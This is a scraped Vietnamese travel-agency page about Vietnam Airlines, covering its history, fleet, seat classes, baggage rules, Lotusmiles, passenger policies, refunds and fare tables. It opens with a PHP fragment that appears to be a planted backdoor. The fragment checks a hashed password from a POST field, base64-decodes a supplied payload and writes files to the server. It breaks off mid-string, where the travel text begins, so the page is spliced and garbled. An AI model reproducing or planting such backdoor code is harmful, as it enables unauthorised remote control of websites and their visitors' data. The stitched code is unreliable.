function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Vé máy bay Vietnam Airlines - Đi Để Đến

Vé máy bay Vietnam Airlines

19/08/2017 Đi Để Đến - Group

Vietnam Airlines là hãng hàng không quốc gia của Việt Nam, được thành lập vào năm 1956 đặt trụ sở chính tại sân bay quốc tế Nội Bài, thủ đô Hà Nội cùng các trạm trung chuyển chính tại sân bay quốc tế Tân Sơn Nhất và sân bay quốc tế Đà Nẵng. Hãng là thành phần chủ lực của Tổng công ty Hàng không Việt Nam, với tỷ lệ vốn nhà nước tại Vietnam Airlines là 86.16% và hãng hàng không Nhật Bản – All Nippon Airways là 8.77%.

Vietnam Airlines là cổ đông lớn nhất của hãng hàng không Jetstar Pacific Airlines với 70% cổ phần, 49% trong Cambodia Angkor Air – hãng hàng không quốc gia Campuchia và 100% trong VASCO – một hãng bay nhỏ chuyên bay ở khu vực miền Nam Việt Nam. Hãng được đánh giá 4 sao, theo tiêu chuẩn của Skytrax, ngày 10/6/2010 Vietnam Airlines chính thức gia nhập liên minh SkyTeam và trở thành hãng hàng không đầu tiên của Đông Nam Á gia nhập liên minh này.

Ve may bay Vietnam Airlines 1 19 8 2017

Đội bay và mạng đường bay của Vietnam Airlines

Là một hãng hàng không quốc gia phát triển, hiện nay Vietnam Airlines đã khai thác đường bay đến 49 điểm tham quan, trong đó có 21 điểm đến nội địa và 28 điểm đến quốc tế tại khu vực Đông Nam Á, Đông Á, châu Âu và châu Đại Dương. Hãng cũng liên kết và hợp tác với rất nhiều các hãng bay khác trên khắp thế giới để chia sẻ và mở rộng đường bay, phục vụ nhu cầu đi lại bằng đường hàng không ngày một cao của hành khách.

Cho đến nay, Vietnam Airlines đang sở hữu đội bay lớn với 84 chiếc máy bay hiện đại với các tiện ích hàng đầu bao gồm Airbus A321-200, Airbus A321neo, Airbus A330-200, Airbus A350-900XWB, Boeing 787-9 Dreamliner… Các máy bay này thường xuyên được nâng cấp với nội thất sang trọng, phi hành đoàn chuyên nghiệp, phục vụ chu đáo.

Quy định về hạng ghế và hành lý của Vietnam Airlines

1. Hạng ghế

Vietnam Airlines hiện đang phục vụ hành khách trên các chuyến bay của hãng với ba hạng ghế chính là hạng Thương gia, hạng phổ thông đặc biệt và hạng phổ thông:

+ Hạng Thương gia: Hành khách sẽ được hưởng những dịch vụ ưu tiên ở mặt đất như làm thủ tục ở quầy thương gia, ưu tiên phục vụ hành lý và được sử dụng phòng chờ Bông Sen. Trong chuyến bay, hành khách được trang bị chỗ ngồi đặc biệt có thể ngả thành giường thoải mái và được sử dụng các chương trình giải trí đặc biệt như âm nhạc, trò chơi điện tử tương tác, tạp chí, được thưởng thức bữa ăn vô cùng hấp dẫn với các món ăn ngon và các loại rượu hàng đầu

+ Hạng phổ thông đặc biệt: Hành khách được hưởng các dịch vụ mặt đất khác như hỗ trợ chọn ghế ngồi, ưu tiên phục vụ hành lý, làm thủ tục và lên máy bay. Được trang bị ghế ngồi thoải mái với khoảng cách giữa hai hàng ghế là 38 – 42 inch có thể ngả ra sau từ 7 – 8 inch, ghế có đèn đọc sách riêng cũng như ngăn chứa hành lý rộng, nhiều tiện ích giải trí trên máy bay và được cung cấp một thực đơn đầy đủ các món ăn và đồ uống hấp dẫn.

+ Hạng phổ thông: Có ghế ngồi thoải mái với khoảng cách giữa hai hàng ghế rộng 32 inch, mỗi ghế có thể ngả 6 inch và bộ tiện ích cần thiết bao gồm gối, chăn và dụng cụ vệ sinh cá nhân cao cấp. Hành khách cũng có nhiều lựa chọn suất ăn của mình, đặc biệt hàng cũng cung cấp suất ăn đặc biệt như suất ăn chay, suất ăn dành cho trẻ em và các suất ăn phục vụ nhu cầu sức khỏe đặc biệt để phù hợp với nhu cầu ăn uống của mỗi hành khách.

Ve may bay Vietnam Airlines 2 19 8 2017

2. Hành lý

Đối với hành lý xách tay: hành khách hạng phổ thông được mang lên máy bay 1 kiện hành lý, hành khách hạng Phổ thông đặc biệt và hạng Thương gia được mang lên máy bay 2 kiện hành lý. Tất cả các kiện hành lý trên phải tuân thủ trọng lượng tối đa 7 kg và tổng kích thước 3 chiều không được vượt quá 115cm.

Đối với hành lý ký gửi: Vietnam Airlines quy định dành riêng cho từng hạng ghế khác nhau mà hành khách đã đặt trước đó

– Hàng khách hạng Thương gia và Phổ thông đặc biệt được mang theo 2 kiện hành lý với trọng lượng tối đa là 30 kg/kiện và kích thước 3 chiều là 115cm.

–  Hành khách hạng Phổ thông được mang theo 2 kiện hành lý với trọng lượng tối đa là 20 kg/kiện và kích thước 3 chiều là 115cm.

– Hành lý miễn cước áp dụng cho trẻ em dưới 2 tuổi:

+ Hành trình từ/đến châu Mỹ hành khách được mang theo tối đa 1 kiện hành lý với trọng lượng là 23kg với tổng kích thước 115cm và một xe đẩy gấp lại được.   

+ Hành trình khác hành khách được mang theo tối đa 1 kiện hành lý với trọng lượng là tối đa 10kg và một xe đẩy gấp lại được.

+ Trọng lượng tối đa của một kiện hành lý cho chuyến hành trình từ/đến châu Mỹ là 32kg và tổng kích thước 3 chiều không vượt quá 203cm, nếu hành lý của bạn vượt quá trọng lượng và hoặc kích thước cho phép hãy liên hệ đến đại lý Vietnam Booking để được tư vấn.

Chương trình ưu đãi của Vietnam Airlines

Bông Sen Vàng (Lotusmiles) là chương trình ưu đãi hấp dẫn nhất của Vietnam Airlines dành cho khách hàng thân thiết, bạn sẽ được hưởng những ưu đãi đặc biệt khi tích lũy dặm/chuyến bay. Đặc biệt hành khách có thể tích lũy dặm thưởng khi bay với Vietnam Airlines hoặc các đối tác hàng không khác trong liên minh hàng không SkyTeam với các hạng Bạch kim, Vàng, Titan và Bạc. Để trở thành hội viên của Bông Sen Vàng hành khách chỉ cần đăng ký tại trang web chính thức của Vietnam Airline.

Một trong những ưu đãi của hội viên hạng bạch kim và vàng của chương trình Bông Sen Vàng là bạn có thể sử dụng trực tiếp phòng chờ Bông Sen, phòng được thiết kế đặc biệt cho hạng thương gia và thành viên SkyTeam Elite. Phòng chờ này là nơi tuyệt vời cho hành khách thư giãn và thưởng thức các tiện ích như internet, phòng tắm, máy bán hàng tự động, quầy thức ăn và nước uống.

Ve may bay Vietnam Airlines 3 19 8 2017

Chính sách dành cho hành khách của Vietnam Airlines

1. Chính sách dành cho trẻ sơ sinh (0–2 tuổi)

– Hãng hàng không Vietnam Airlines từ chối vận chuyển trẻ dưới 7 ngày tuổi, sinh non hoặc có tình trạng sức khỏe nghiêm trọng.

– Xe nôi phải được gửi theo diện hành lý kí gửi.

– Hãng cung cấp suất ăn đặc biệt miễn phí cho trẻ từ 2 tuổi trở xuống và nhẹ hơn 11 kg, để sử dụng dịch vụ này hành khách cần gửi yêu cầu ít nhất 24 giờ trước khi chuyến bay được khởi hành. Lưu ý, vì số lượng suất ăn có giới hạn nên hãng sẽ ưu tiên cung cấp dịch vụ cho những hành khách đăng ký trước.

– Hành khách có thể yêu cầu suất ăn sơ sinh miễn phí nhưng phải đặt 24 giờ trước khi bay.

2. Chính sách dành cho hành khách trẻ em (từ 2 – 18 tuổi)

– Hành khách là trẻ em được khuyến cáo nên đi cùng người lớn.

– Hành khách là trẻ em phải ở cùng chuyến bay và cùng hạng với người đi kèm với cha mẹ hoặc người giám hộ hợp pháp, nếu không sẽ được xem như là trường hợp trẻ em đi một mình.

– Đối với trẻ em đi một mình, hành khách phải thực hiện đầy đủ những điều kiện theo quy định hiện hành của hãng như:

+ Hành khách từ 2 – 6 tuổi phải sử dụng dịch vụ trẻ em đi một mình và đăng ký dịch vụ tiếp viên đi cùng.

+ Hành khách từ 6 – 14 tuổi phải sử dụng dịch vụ dịch vụ trẻ em đi một mình nhưng không bắt buộc phải đăng ký dịch vụ tiếp viên đi cùng.

+ Hành khách từ 14 – 18 tuổi có thể du lịch một mình mà không bắt buộc phải đăng ký dịch vụ nào.

– Dịch vụ trẻ em đi một mình phải được đăng ký ít nhất 24 giờ trước khi chuyến bay được khởi hành.

– Dịch vụ tiếp viên đi cùng phải được đăng ký ít nhất 3 ngày trước khi chuyến bay được khởi hành đối với đường bay quốc nội và 5 ngày trước khi bay đối với đường bay quốc tế.

– Bố mẹ hoặc người giám hộ phải hoàn thành hai mẫu đơn trước khi khởi hành: Mẫu thứ nhất là Giấy yêu cầu vận chuyển trẻ đi một mình, bao gồm thông tin chi tiết về trẻ, bố mẹ hoặc người giám hộ hợp pháp và người sẽ đón trẻ tại sân bay đến. Mẫu thứ hai là Giấy ủy quyền trẻ đi một mình, đây là cam kết của người giám hộ gửi đến hãng bay.

– Người giám hộ đón tại sân bay đến phải có mặt ở sân bay ít nhất 30 phút trước khi trẻ đến và phải xuất trình các giấy tờ cần thiết để đón trẻ.

Ve may bay Vietnam Airlines 4 19 8 2017

3. Chính sách dành cho phụ nữ mang thai

Hành khách mang thai là hành khách đặc biệt trên các chuyến bay vì vậy phải tuân thủ đầy đủ các quy địncủa hãng trước chuyến bay, để bảo đảm an toàn cho bản thân và toàn bộ phi hành đoàn. Hành khách phải xuất trình giấy tờ y tế (MEDIF) trước khi bay.

+ Các tài liệu này cần phải được viết bằng tiếng Anh, Vietnam Airlines cung cấp hai mẫu đơn gồm MEDIF I và MEDIF II được sử dụng tùy theo thời gian và tình trạng mang thai của hành khách.

+ Hành khách mang thai 32 tuần được xem là hành khách bình thường và chỉ cần nộp giấy MEDIF I.

+ Hành khách mang thai từ tuần thức 32 – 36 tuần phải nộp giấy MEDIF II được lập trong vòng 14 ngày trước khi bay.

+ Hành khách mang thai trên 36 tuần phải nộp cả giấy MEDIF I và MEDIF II, được lập trong vòng 7 ngày trước khi bay.

+ Vietnam Airlines từ chối vận chuyển hành khách sau sinh trong vòng 7 ngày, hành khách có tuổi thai hoặc ngày dự sinh không xác định, hành khách mang thai đôi hoặc ba, có thai bằng thụ tinh nhân tạo, có thể có biến chứng khi sinh và hành khách thuộc các tình huống đặc biệt phải nộp giấy MEDIF I và MEDIF II được lập trong vòng 14 ngày trước khi bay.

4. Chính sách hỗ trợ hành khách hạn chế sức khỏe và khả năng di chuyển kém

Hành khách có hạn chế về sức khỏe và khả năng di chuyển như người già, hành khách khuyết tật cần sử dụng xe lăn hoặc khiếm thính, khiếm thị… có thể bay nếu đang trong tình trạng sức khỏe ổn định hoặc bình thường. Vietnam Airlines có cung cấp dịch vụ hỗ trợ di chuyển bao gồm chó dẫn đường cho hành khách khiếm thị và khiếm thính, dịch vụ dành cho hành khách khiếm thính và khiếm thị, dịch vụ xe lăn và dịch vụ tiếp viên đi kèm.

Lưu ý, các dịch vụ này không áp dụng cho các chuyến bay đến và từ Hoa Kỳ và hành khách phải gửi yêu cầu ít nhất 8 tiếng trước khi chuyến bay được thực hiện đối với các chuyến bay nội địa và 24 tiếng trước chuyến bay quốc tế. Hành khách có thể liên hệ đến đại lý Vietnam Booking để tìm hiểu và tư vấn chi tiết trước khi tham gia các chuyến hành trình dành cho đối tượng đặc biệt này.

Ve may bay Vietnam Airlines 5 19 8 2017

5. Chính sách hoàn tiền và đổi lịch bay của Vietnam Airlines

– Đổi hành trình: Đối với trường hợp được đổi vé, Vietnam Airlines chỉ chấp nhận cho hành khách đổi sang hành trình mới với giá bằng hoặc cao tiền hơn, phí thay đổi nhiều chặng được áp dụng mức phí cao nhất của các chặng bay thay đổi và không được hoàn trong bất cứ trường hợp nào. Khi thay đổi chặng bay bạn sẽ phải trả phí phí cố định và phần chênh lệch giá vé (nếu có).

– Hoàn tiền: Hành khách mua vé máy bay Vietnam Airline được phép yêu cầu hoàn tiền với các lý do cá nhân như ốm đau, mang thai, qua đời, tự hủy đặt chỗ, do hãng hủy chuyến hoặc thay đổi lịch bay, do bất khả kháng hoặc đặt chỗ trùng lặp. Tuy nhiên cũng tùy từng trường hợp mà hãng có thể xem xét và chấp thuận lý do yêu cầu hoàn tiền. Đối với hoàn vé Vietnam Airlines đã sử dụng một phần, hành khách được nhận lại phần chênh lệch giữa giá vé đã mua mới với vé của chặng bay đã sử dụng, hãng cho phép khách hàng nâng hạng nếu còn chỗ và phải trả phí thay đổi cùng chênh lệch giá vé.

Trong trường hợp Vietnam Airlines thay đổi ngày giờ bay, nếu khách hàng hoàn vé sẽ không mất thêm khoản phí nào, hãng sẽ có trách nhiệm hoàn lại đúng số tiền bằng tiền vé, thuế phí và phụ thu dịch vụ bán vé của chặng bay mà khách chưa sử dụng. Các trường hợp được hoàn vé do hãng thay đổi lịch bay bao gồm:

– Chuyến bay bị chậm 15 phút với giờ khởi hành thực tế dự kiến cất cánh theo lịch bay công bố của Vietnam Airlines.

– Chuyến bay bị hủy

– Chuyến bay khởi hành sớm hơn thời gian dự kiến cất cánh mà Vietnam Airlines công bố.

– Hành khách bị từ chối vận chuyển khi đã có chỗ được xác nhận trên hệ thống của hãng, có mặt tại quầy làm thủ tục theo đúng quy định nhưng không được vận chuyển trên chuyến bay đó.

Ve may bay Vietnam Airlines 6 19 8 2017

Tham khảo thêm thông tin hữu ích: Quy định hoàn đổi vé của Vietnam Airlines

Mua vé máy bay giá rẻ tại tại dideden.com

Trước mỗi chuyến hành trình chắc chắn bạn sẽ mong muốn tìm được cho mình những tấm vé máy bay giá rẻ nhất, cùng những thông tin quan trọng về thủ tục giấy tờ trước và sau chuyến bay cũng như các điểm tham quan hấp dẫn nhất. Hãy để đại lý của chúng tôi giúp bạn nhanh chóng được sở hữu tấm vé như ý cùng những chuyến đi phù hợp nhất, bạn có thể liên hệ đến tổng đài 1900 636 167 để được đội ngũ nhân viên giàu kinh nghiệm của chúng tôi hỗ trợ.

Bạn cũng có thể truy cập website dideden.com – hệ thống book hiện đại bậc nhất giúp bạn dễ dàng tìm kiếm các thông tin giá vé, giờ bay và các chương trình khuyến mãi hấp dẫn của Vietnam Airline và bất cứ hãng hàng không nào mà bạn đang có nhu cầu tìm kiếm. Bạn cũng có thể đến trực tiếp tại văn phòng của chúng tôi để được nhân viên phòng vé hỗ trợ đặt và giải đáp mọi thắc trước chuyến hành trình của bạn.

Bảng giá các chặng bay phổ biến đang được Vietnam Airlines khai thác

 

Bảng giá vé máy bay Vietnam Airlines khởi hành từ Hà Nội

 

Điểm đi Điểm đến Giá vé Ngày bay
Hà Nội (HAN)
06:00
Buôn Ma Thuột (BMV)
07:45
Từ 900,000 VNĐ Thứ 2, 4, 6, cn
Hà Nội (HAN)
07:00
Cần Thơ (VCA)
09:10
Từ 1.010,000 VNĐ Hàng ngày
Hà Nội (HAN)
12:55
Chu Lai (VCL)
14:20
Từ 735,000 VNĐ Hàng ngày
Hà Nội (HAN)
12:05
Đà Lạt (DLI)
14:00
Từ 1,395,000 VNĐ Hàng ngày
Hà Nội (HAN)
06:00
Đà Nẵng (DAD)
07:20
Từ 680,000 VNĐ Hàng ngày
Hà Nội (HAN)
07:45
Đồng Hới (VDH)
09:15
Từ 1,615,000 VNĐ Hàng ngày
Hà Nội (HAN)
06:00
Hồ Chí Minh (SGN)
08:10
Từ 1.010,000 VNĐ Hàng ngày
Hà Nội (HAN)
07:30
Huế (HUI)
08:40
Từ 735,000 VNĐ Hàng ngày
Hà Nội (HAN)
06:40
Nha Trang (CXR)
08:35
Từ 1.010,000 VNĐ Hàng ngày
Hà Nội (HAN)
05:55
Phú Quốc (PQC)
08:00
Từ 1,120,000 VNĐ Hàng ngày
Hà Nội (HAN)
07:25
Quy Nhơn (UIH)
09:05
Từ 955,000 VNĐ Hàng ngày
Hà Nội (HAN)
18:15
Vinh (VII)
19:05
Từ 680,000 VNĐ Hàng ngày

Các chuyến bay quốc tế

Hà Nội (HAN)
23:45
Amsterdam (AMS)
11:35
Từ 17,837,000 VND Hàng ngày
Hà Nội (HAN)
21:20
Sydney (SYD)
08:15
Từ 15,187,000 VNĐ Hàng ngày
Hà Nội (HAN)
16:00
Melbourne (MEL)
08:35
Từ 15,001,000 VNĐ Hàng ngày

Hà Nội (HAN) 

11:25

Moscow (DME)
17:00
Từ 12,675,000 VNĐ Thứ 3, 5, 7
Hà Nội (HAN)
23:45
London (LHR)
10:30
Từ 16,226,000 VNĐ    Thứ 3, 4, 5, 6, 7, CN
Hà Nội (HAN)
23:25
Rome (ROM)
13:45
Từ 18,171,000 VNĐ Hàng ngày
Hà Nội (HAN)
10:20
Seoul (ICN)
16:35
Từ 7,142,000 VNĐ Hàng ngày
Hà Nội (HAN)
00:30
Tokyo (NRT)
07:35
Từ 12,949,000 VNĐ Hàng ngày
Hà Nội (HAN)
10:10
Bắc Kinh (PEK)
14:45
Từ 7,483,000 VNĐ Thứ 3, 4, 6, 7, CN
Hà Nội (HAN)
6:00
Bangkok (BKK)
13:10
Từ 2,167,000 VNĐ Hàng ngày

Hà Nội (HAN)

14:45

Kuala Lumpur (KUL)
19:00
Từ 3,384,000 VNĐ Thứ 3, 4, 6, 7, CN
Hà Nội (HAN)
7:35
Singapore (SIN)
11:55
Từ 3,954,000 VNĐ Hàng ngày
Hà Nội (HAN)
07:00
Phnom Penh (PNH)
13:25
Từ 4,262,000 VNĐ Hàng ngày
Hà Nội (HAN)
09:55
Vientiane (VTE)
11:05
Từ 3,043,000 VNĐ Hàng ngày
Hà Nội (HAN)
08:15
Los Angeles (LAX)
21:20
Từ 13,281,000 VNĐ Hàng ngày
Hà Nội (HAN)
08:15
San Francisco (SFO)
20:35
Từ 13,281,000 VNĐ

Hàng ngày

 

Bảng giá vé máy bay Vietnam Airlines khởi hành từ TPHCM

 

Điểm đi Điểm đến Giá vé Ngày bay
Hồ Chí Minh (SGN)
05:45
Hà Nội (HAN)
07:50
Từ 1,010,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
19:20
Buôn Ma Thuột (BMV)
20:20
Từ 570,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
05:55
Cà Mau (CAH)
06:55
Từ 1,725,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
06:30
Đà Nẵng (DAD)
07:50
Từ 680,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
06:35
Đà Lạt (DLI)
07:25
Từ 680,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
18:05
Đồng Hới (VDH)
19:40
Từ 790,000 VNĐ Thứ 2, 4, 5, 7
Hồ Chí Minh (SGN)
05:55
Hải Phòng (HPH)
07:55
Từ 1,065,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
05:40
Huế (HUI)
07:05
Từ 680,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
09:05
Nha Trang (CXR)
10:15
Từ 680,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
06:05
Phú Quốc (PQC)
07:05
Từ 823,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
07:25
Quy Nhơn (UIH)
08:45
Từ 625,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
06:00
Rạch Giá (VKG)
06:50
Từ 515,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
12:15
Thanh Hóa (THD)
14:15
Từ 1,065,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
06:40
Vinh (VII)
08:30
Từ 1,065,000 VNĐ Hàng ngày

Các chuyến bay quốc tế

Hồ Chí Minh (SGN)
21:30
Melbourne (MEL)
08:35
Từ 10.367,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
21:00
Sydney (SYD)
08:15
Từ 10,553,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
08:30
Amsterdam (AMS)
09:55
Từ 16,048,000 VNĐ Thứ 3, 4, 6, 7, CN
Hồ Chí Minh (SGN)
09:10
Seoul (ICN)
16:25
Từ 6.800,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
00:15
Tokyo (NRT)
08:00
Từ 12,835,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
07:00
Bangkok (BKK)
14:45
Từ 2,964,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
15:05
Kuala Lumpur (KUL)
18:05
Từ 1,904,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
05:45
Singapore (SIN)
14:50
Từ 3,157,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
16:25
Los Angeles (LAX)
20:50
Từ 13,167,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
16:25
San Francisco (SFO)
20:35
Từ 13,167,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
08:30
Phnom Penh (PNH)
09:25
Từ 2,588,000 VNĐ Hàng ngày
Hồ Chí Minh (SGN)
15:55
Vientiane (VTE)
19:15
Từ 4,182,000 VNĐ

Hàng ngày

 • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
  Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
 • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
  Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
 • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
  Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
 • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
  Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
 • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
  Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
 • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
  Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]